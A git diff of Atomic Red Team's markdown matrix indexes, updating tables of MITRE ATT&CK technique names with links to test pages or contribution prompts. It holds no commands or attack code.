+| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Launchd](../../T1053.004/T1053.004.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Screen Capture](../../T1113/T1113.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1562.003/T1562.003.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Information Discovery](../../T1082/T1082.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+| | | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Rc.common](../../T1037.004/T1037.004.md) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Rc.common](../../T1037.004/T1037.004.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Startup Items](../../T1037.005/T1037.005.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Non-Standard Port](../../T1571/T1571.md) | |
+| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | SSH Authorized Keys [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Startup Items](../../T1037.005/T1037.005.md) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Trap](../../T1546.005/T1546.005.md) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Rename System Utilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Rootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
| | | | | [Software Packing](../../T1027.002/T1027.002.md) | | | | | | | |
@@ -52,9 +57,8 @@
| | | | | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | | | | | | | |
| | | | | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | | | [Timestomp](../../T1551.006/T1551.006.md) | | | | | | | |
+| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index 08107404..3b3fd7c9 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -4,98 +4,108 @@
| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash](../../T1059.004/T1059.004.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Application Shimming](../../T1546.011/T1546.011.md) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | RDP Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Clear Command History](../../T1551.003/T1551.003.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1551.002/T1551.002.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1551.001/T1551.001.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Share Discovery](../../T1135/T1135.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Resource Hijacking](../../T1496/T1496.md) |
-| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keychain](../../T1555.001/T1555.001.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Data Staging](../../T1074.001/T1074.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
-| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Volume Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSA Secrets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
